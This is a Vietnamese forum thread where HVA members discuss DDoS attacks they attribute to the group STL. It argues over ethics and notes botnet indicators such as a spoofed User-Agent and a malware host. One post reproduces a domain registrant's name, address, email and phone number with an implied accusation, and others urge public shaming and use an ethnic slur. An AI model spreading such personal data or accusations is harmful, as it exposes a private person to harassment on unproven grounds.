Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

mv1098 wrote:

Theo mình nghĩ không nên mang chuyện triết lý và đạo đức để phê phán nhóm STL , vì dẫu sao họ cũng làm việc theo lý tưởng, theo mục đích sống của họ dẫu có thể đó là mù quáng. ở 1 góc độ nào đó thì cũng phải cảm ơn họ vì họ mà những người nhiệt huyết và có tâm như TQN cũng như BQT HVA đã mở mang kiến thức cho mọi người từ trình độ it basic đến advance hiểu thêm về virus và các biện pháp bảo vệ, vốn dĩ những kỹ thuật RC chỉ lưu hành nội bộ. Chỉ thực sự khi nào họ ngã ngựa trên con đường họ đang đi và bởi chính đức tin họ đang theo đuổi làm họ ngã thì có thể họ cảm nhận được và hiểu ra vấn đề. PS mình rất thích anh TQN châm chọc STL bằng kỹ thuật và những phân tích.

@mv1098 : quả thật những lời nói "nhẹ nhàng" và "điềm đạm" của bạn thật dễ nghe; nhưng những điều dễ nghe, những lời iêu thương chưa chắc đã là sự "cứu dỗi" cho những linh hồn với những mớ "lý tưởng " phá hoại kiểu trẻ nít này chắc bạn cũng đồng ý với tôi điểm này. kô mang họ ra mổ xẻ lên án ở đây thì đợi đến khi mùa quyt' sang năm và mang ra diễn đàn trẻ nít để mắng mỏ tụi nhỏ này sao???

Phân tích tính chất vài trận DDoS HVA vừa qua.

levanduyet — GMT

conmale wrote:

Chắc chắn stl vẫn còn ít nhất là 1 botnet khác chưa bị phát hiện. Chắc chắn các zombies vẫn còn nhiễm một thứ tương tự như "AcrabatUpdater.exe".

Từ sáng đến giờ vào không được, tranh thủ vào buổi tối (vì nghĩ rằng buổi tối các máy bị botnet ở VN tắt máy nên trang HVA không bị DDOS) Hy vọng các bạn có thể phát hiện ra các botnet khác để có thể cảnh báo cho người dùng khác nhằm chấm dứt cái trò đuổi tìm này. Tks conmale, TQN,... LVD

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

myquartz wrote:

Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn...

Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ? Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn). Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám? Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy!

Phân tích tính chất vài trận DDoS HVA vừa qua.

nobody198 — GMT

conmale wrote:

myquartz wrote:

Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn...
Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ? Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn). Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám? Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy!

Mình đồng ý với conmale và các quản trị HVA khác! Dẫu thế giới mạng có thật giả lẫn lộn, kẻ đen - người trắng nhưng bạn phải tin vào lý trí của mình, lý tưởng của mình. Những người như bạn comale, TQN... đang làm tất cả để bảo vệ ngôi nhà HVA, bảo vệ lý tưởng của HVA, bảo vệ niềm tin - niềm tin vào chính nghĩa. Cảm ơn vì tất cả!

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@anh conmale có những người không bị động chạm vì bị hacker tấn công mà là bị chửi anh à. @myquartz Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề "chọc gậy bánh xe", "gắp lửa bỏ tay người" cũng không thua kém gì Lý Thông cả. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn...

Phân tích tính chất vài trận DDoS HVA vừa qua.

asmking — GMT

- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ. - Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

asmking wrote:

- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ. - Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác.

Cũng không hẳn những blog kia là lề trái. ngày xưa việt nam theo tầu khựa viết từ bên phải sang bên trái là ngược lại so với thế giới văn minh hiện đại =)) nay làm trái lại cái lè đấy có khi lại là đúng và văn minh tiên bộ ;)) Nếu gọi là diễn đàn blog lề trái thì theo mình nên cho thêm "(theo 1 số ít người việt nam)" =)) cho nó chuẩn

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

asmking wrote:

- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ.

Được như vậy thì quá tuyệt vời rồi :) nhưng không may, cho đến nay qua hết thập niên thứ nhất của thế kỷ 21 rồi, sống trong thời đại "information age" rồi nhưng vẫn chưa thoát khỏi bóng ma này. Thật ra, nước Việt ta tội nghiệp, hết bị đô hộ rồi đến chiến tranh triền miên, con người trở nên sợ hãi, mặc cảm, hung hãn, thậm chí tàn nhẫn nhưng vẫn không thoát nổi ám ảnh nhược tiểu. Bởi vậy, không đủ khả năng, không đủ dũng khí để nói và nghe theo đúng tinh thần nhân văn, nhân đạo. Từ thời nảo thời nao, ta đã có những câu ca dao: Lời nói không mất tiền mua Lựa lời mà nói cho vừa lòng nhau. Đạo Phật du nhập vào nước ta rất sớm (có những dấu hiệu từ thế kỷ thứ III trước Công Nguyên, Phật Giáo đã du nhập vào Việt Nam). Đạo Phật lấy cái tâm làm gốc, dạy con người biết yêu thương, tha thứ, biết bỏ cái sai trái để quay về cái đúng đắn, chân thật. Hay vì chiến tranh quá tàn khốc, mất mác quá nhiều cho nên bây giờ cái gì cũng phải đúng không thể sai, cái gì cũng phải thắng không thể thua? Thậm chí đi tới chỗ thành tích thì ít nhưng phải xít cho nhiều và cái gì sai thì phải ếm cho kỹ. Việc ếm này bao gồm luôn việc phá hoại và bịt miệng. Có 2 loại người, loại dùng trí tuệ và ngôn ngữ để giải quyết trở ngại và loại dùng nắm đấm (hoặc bất cứ thứ gì khác dù tệ hại tới đâu) để giải quyết. Ở đâu cũng có hai loại người này. Chỉ có điều nếu loại người thứ hai chiếm đa số thì xã hội loài người đang đi thụt lùi về lại thời đại ở hang đá bởi vì con người ở thời đó dùng nhiều bắp cơ mà lại ít trí tuệ.

asmking wrote:

- Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác.

Người dân Việt Nam không phải kém cỏi, không trí tuệ, thiếu đoàn kết mà vì những đức tính ấy không được duy trì và phát huy đúng mức. Chừng nào còn biết được cái sai, tiếp nhận cái sai và sửa chữa những cái sai thì chừng ấy còn phát triển. Chừng nào mà vẫn tiếp tục đúng, tiếp tục chiến thắng, tiếp tục thành tích thì chừng ấy những đức tính kia sẽ bị thui chột bởi vì chẳng có gì để vươn lên và phát triển nữa (và trên đời này thì chẳng có cái gì đúng mãi được trong khi thật sự sai phè thì đầy ra đó).

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Có "lề trái", "lề phải" hay "lề giữa" như tui thì cũng kệ người ta. Hiến Pháp Viet Nam ta quy định "Công dân có quyền tự do ngôn luận" (điều mấy thì sorry, tui không nhớ). Vì vây, theo "ngu ý" của tui: 1. Hành động DDOS, chiếm đoạt blog, xoá bài viết trên blog của người ta là vi phạm hiến pháp. Hơn nữa, đa số các blog lề trái là của người Việt ta được đặt ở nước ngoài, những người đó là đa số công dân nước ngoài, không phải mang công dân, quốc tịch Viet Nam. Các hành động phá hoại trên của mấy "đại ca" trên đội dưới đạp, "sống chết theo lệnh", "sống chết phập phù (hay phập phồng ha ?)" này là vi phạm pháp luật quốc tế, vi phạm luật pháp nước đó. 2. Hành động "bạch hoá" của stl là hành động vi phạm pháp luật ở mọi nước. Bôi nhọ, lăng nhục, xúc phạm người khác thì ở nước nào cũng vậy (trừ một số nước ra ???) ra thì phải hầu toà, bị pháp luật mời đi "nghỉ mát, đài thọ cơm nước" ??? 3. Hành động viết, phát tán virus, malwares thì ở đâu cũng vậy, mọi nước: vi phạm pháp luật, cũng được mời đi "nghỉ mát" luôn. 4. Hành động chiếm đoạt hộp mail của người khác: xâm phạm quyền tự do, bí mật thư tín của người khác, chiếm đoạt tài sản của người khác. 5. Hành động DDOS dùng bot nằm vùng: xâm phạm và sử dụng bất hợp pháp tài sản cá nhân (cái máy tính), ảnh hưởng đường truyền, băng thông là tài sản chung của xã hội, do người dân đóng thuế mà có. Kiến thức pháp luật của tui thì <= 0, viết ra các bác đừng cười, nghĩ sao viết vậy thôi. Nhiều cậu còn nguỵ biện, bao che cho hành động xấu xa của stl. Vd có cậu đã nói với tui là công cụ không phản ánh con người, hay họ hành động như vậy vì ổn định chính trị, hay tui đang làm "tester" miễn phí cho stl.... Nhiều câu làm tui rất bức xúc (hay nói thẳng là tức lộn gan). Đx, đã là ăn cướp, ăn trộm thì không có thằng ăn cướp ăn trộm nào là 100% chính nghĩa hết (thậm chí mấy thằng kiếm hiệp hồi nhỏ em ghiền đọc: cướp của nhà giàu chia cho nhà nghèo). Đã là cướp, là trộm thì pháp luật chính nghĩa sẽ sờ gáy không sớm thì muộn, còn nếu pháp luật chưa sờ gáy vì lý do xxx gì đó thì thì công luận, nhân dân, lương tâm mọi người cũng lên án, phỉ nhổ, khinh bỉ. Và đã là ăn cướp, ăn trộm thì đi cướp bằng xe con hay xe đạp, dùng kiếm Nhật, súng hay dao mổ heo thì cũng là cướp là trôm thôi. Cậu đồng ý với tui không Look2Me ? Con người chính nghĩa, ngay thẳng không bao giờ dùng những hành động, công cụ xấu xa đê hèn đó, trừ những con người thuộc thế hệ bị nhiểm nặng tư tưởng "trên đội dưới đạp", bất chấp tất cả, chà đạp lên người khác, tham nhũng, hối lộ... để đạt mục đích mà thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

Đọc những dòng anh conmale viết phía trên em tâm đắc quá, và cũng xin phép được tham gia vài câu . Người đời thường có câu "usually, your actions base on what you believe" tạm dịch " những điều bạn làm, thường dựa vào những gì bạn tin ". Đạo Chúa cũng du nhập vào nước ta rất sớm. Đạo Chúa dạy con người biết yêu thương, sản sẻ và trung thực; nhưng hơn thế nữa đạo Chúa chỉ dạy rằng, cuộc sống đời sau " after death" mới thực sự là cuộc sống đời đời và quan trọng nhất. Cuộc sống này chỉ là một sự thử thách của tâm thần và linh hồn mỗi con người trước những cám dỗ và bóng tối. Con người việt nam trải qua bao thăng trầm của lịch sử phát triển dân tộc đã luôn thể hiện rõ sự sáng tạo và khả năng học hỏi; điều này thể hiện rõ khi chúng ta đã tách ra khỏi dân trung quốc, chúng ta đã phát triển chữ hán nôm cho riêng mình dựa trên chữ tàu, và sau này là chúng ta tiếp thu chữ quốc ngữ do các nhà chuyền giáo Tây phương truyền cho. Người việt nam đương đại (phần nhiều) sống chưa trung thực, sống chưa nhân ái, sống khổ nhọc, vất vả và không thanh thản. BỞI ĐÂU ??? = niềm tin của họ để nơi nào vậy? liệu rằng họ có để nơi thanh tịnh, bình an vô thường dung dị nơi đạo Phật? hay họ san sẻ, yêu thương hết mình, sống phước hạnh để đời sau được về nơi thiên đàng với Chúa ? oh NO NO..vậy đại bộ phận họ tin vào đâu? họ tin vào những hành động mang lợi lại cho họ trước mắt mà bỏ qua thương hiệu của cả một dân tộc. họ tin vào chính họ nhiều hơn họ tin vào anh sáng và chân lý của sự thật. họ tin vào tối tăm và đường tắt vì điều đó dẫn họ tới sự sung sướng trần gian. họ tin vào sự trá hình; họ tin vào mọi điều khiến cho RIÊNG bản thân họ phê pha . Chúa ơi ! Vì điều họ tin là bóng tối nên hành động của họ u ám và khổ đau . Chúa Trời (ông trời) đã dành ưu ái, đã giác ngộ dân tộc này, đã thử thách qua khổ đau triền miên của chiến tranh, bệnh dịch, lụt lội .v.v nhưng đến vòng thi cuối cùng họ đã bỏ đi cái chân lý chung ngàn đời để đặt cải RIÊNG bản ngã lên trên hết. Do vậy hành động họ làm dựa vào một MỚ lý thuyết tả phế lù của mọi khúc đoạn của lịch sử phát triển nhân loại. Họ biết thể nhanh chóng, núp bóng mọi môi trường như con tắc kè hoa chẳng muốn ra ánh sáng!! họ cài cắm, họ dân vận, họ block họ ban mọi ánh sáng ! họ muốn mọi người trong tối tăm giống họ. => họ là malware . xin hết ! xin lĩnh giáo các anh các bạn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity — GMT

Đã có thông báo của vietnamnet về sever quá tải : http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/35560/thong-bao-ve-viec-vietnamnet-bi-qua-tai.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

insanity wrote:

Đã có thông báo của vietnamnet về sever quá tải : http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/35560/thong-bao-ve-viec-vietnamnet-bi-qua-tai.html

Tối hôm qua tớ nhận được một đoạn tcpdump lấy trên hệ thống proxy của vietnamnet. Thông qua tính chất của những request "bất thường", tớ xác nhận thủ phạm cuộc tấn công vào vietnamnet chính là stl. Một IP thuộc mạng "ba gờ" của vinaphone mà gởi 4 request trong 1 giây đến 4 trang khác nhau của vietnamnet?

Một IP khác trong chuỗi IP động cho ADSL của FPT cũng chẳng khác mấy:

Đây là cái trò đổi random User-Agent và "crawl" của con bot stl chớ không chạy đằng trời nào hết, không thì dân Việt Nam mê đọc vietnamnet thiệt, hì hì.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

conmale wrote:

PS: tớ phải nói thật là tớ rất buồn khi khám phá ra một số chi tiết dính líu đến một số thành viên HVA (hoặc đã từng là thành viên của HVA) cũng thuộc đám phá hoại này nhưng không sao, một cái cây còn có cành cao, cành thấp, lá xanh, lá sâu mà huống hồ chi mạng ảo tạp nham?

Đã là thành viên HVA, mà còn DDos HVA, đúng là ăn cháo đá bát. Cảm ơn các anh, em HVA nhiệt tình phân tích đám malware STL và gửi những hướng dẫn để mọi người biết cách diệt lũ virus sâu mọt này. Hi vọng các anh, em luôn luôn cập nhật cách diệt lũ malware STL xấu xa này để giúp mọi người hiểu hơn về cách phòng và chống malware. Em rất thích kỹ thuật phân tích malware của các anh TQN, acoustics89, lequi, asaxin, bolzano_1989...(nhiều quá hok nhớ hết tên mấy anh, em-->thông cảm nhe). Hok biết chừng nào em mới làm được giồng mấy anh đây, buồn về trình độ mình quá. Hic hic..

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vấn đề quan trọng nhất là chúng ta phải hợp lực nhau lúc này để tìm ra con bot mà chúng ta chưa biết đang DDOS Vietnamnet và HVA ta. Mong bà con cùng tham gia, ai có súng dùng súng, ai có dao dùng dao như lời Bác hồi xưa kêu gọi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

GhoZt — GMT

Mình nghĩ đã đến lúc nên bạch hoá cái bọn stl bẩn thiểu đó đi ! Pháp luật VN ko (hoặc chưa) sờ đến nó thì mình cũng phải vạch mặt bọn chúng ! Mọi người cứ xem, bon stl đã bị a Conmale, TQN .. nói bóng gió về bọn nó rồi nhưng bọn chúng vẫn ko sợ, vẫn ddos và ddos cả HVA chúng ta ! Phải lôi chúng ra đi, lôi ra để a e ta bít mà phỉ nhổ ! mấy chục ngàn bãi nước bọt cũng đủ dìm chết tụi nó !!!

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Tui cũng có ý kiến nên bạch hoá bọn này. Cho giang hồ chửi chơi chứ ko để làm gì cả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

conmale wrote:

Vừa phát hiện một botnet khác sử dụng User-Agent "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)". Sau đây là danh sách 300 IP dữ dằn nhất (chủ yếu là từ VN). Nếu anh chị em nào thấy có IP của mình nằm trong danh sách này, xin vui lòng liên hệ trực tiếp với tôi qua PM. Cám ơn. 113.160.101.152 113.160.110.89 113.160.111.68 ............................. 58.187.96.164 66.110.121.148 71.21.15.74

Cám ơn thông tin của anh conmale. Tôi có vài ý kiến sau: 1- Chắc là STL đang áp dụng kỹ thuật "User agent spoofing" cho mạng botnet mới này. 2- Như vậy trong virus -trojan của STL phải có một tool (hay codes) thay đổi (change) IE' User agent string hay FireFox' User agent string, áp dung cho mọi version của IE hay FF. (Xin TQN và acc chú ý điều này khi RCE các virus của STL) 3- Việc "User agent spoofing" có lẽ để vượt qua một vài rule nào đó của bác conmale config. trong Robot Exclusion standard (robots.txt), tai web root. Ngoài ra việc spoofing User agent cũng làm cho các tiện ích quản lý user của website như Sitemap, Weblog... sẽ mất tác dụng hay giảm tác dụng 4- Tôi chưa hỏi anh comale về sự có hay không việc áp dụng ACAP (Automated Content Access Protocol) plug-in với robots.txt ? 5- Về riêng cái user agent khá đăc biệt trên đây của STL "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)", thì aicrawler at accoonabot dot com là một email: aicrawler@accoonabot.com và Accona là tên 1 công ty có website là www.accona.com (chuyên về web search engine, có chi nhánh tai Thương Hải TQ). Công ty này đã đóng cửa từ lâu và một công ty khác đã mua lai. Tôi đang tìm hiểu về mối liên quan đến một web crawler nào đó, có hay không? 6- Trong các đia chỉ IP nói trên thì đa phần của VN (ở cả 3 miền Bắc, Trung Nam do các ISP VNPT, Viettel, FPT quản lý). Có một số đia chỉ IP ở Lào, châu Phi, Nam Triều tiên...

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới ngày hôm nay, 16-08-2011, host map.priper.info không còn trả về flower.bmp và aqua.bmp nữa, nginx trả về "404 Not Found". Kiểm tra trên robtex.com, thấy có điều lạ là host: E9tn.com lại có cùng IP với map.priper.info. Cái này thì em không hiểu, các bác rành về network giải thích giùm em. Kiểm tra trong tab Whois của e9tn.com thì thấy Code:

Registrant:
DAHAI HUANG

Kiểm tra tiếp với http://who.godaddy.com/whoischeck.aspx?Domain=E9TN.COM thì thấy thêm thông tin sau về anh chàng tàu khựa này: Code:

Registrant:
DAHAI HUANG
hanjiang
putian, Fujian 351100
China

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: E9TN.COM
Created on: 07-Jan-11
Expires on: 07-Jan-12
Last Updated on: 07-Jan-11

Administrative Contact:
HUANG, DAHAI bluesea696@hotmail.com
hanjiang
putian, Fujian 351100
China
+86.1506036226

Technical Contact:
HUANG, DAHAI bluesea696@hotmail.com
hanjiang
putian, Fujian 351100
China
+86.1506036226

Domain servers in listed order:
NS67.DOMAINCONTROL.COM
NS68.DOMAINCONTROL.COM


Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited

Mấy anh stl có thấy "đại ca" DAHAI HUANG này quen quen không ? Link để bạn đọc kiểm tra = robtex: http://www.robtex.com/dns/map.priper.info.html http://www.robtex.com/dns/e9tn.com.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Em bổ xung thêm mấy cái domain nữa của bro DAHAI HUANG 1 loạt các domain đã bị suspended vì spam và phát tán virus lunette-carrera-2020.com puma-max.com r3tn.com ckgstar.com frr5.com

Phân tích tính chất vài trận DDoS HVA vừa qua.

myquartz — GMT

conmale wrote:

myquartz wrote:

Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn...
Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ? Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn). Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám? Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy!

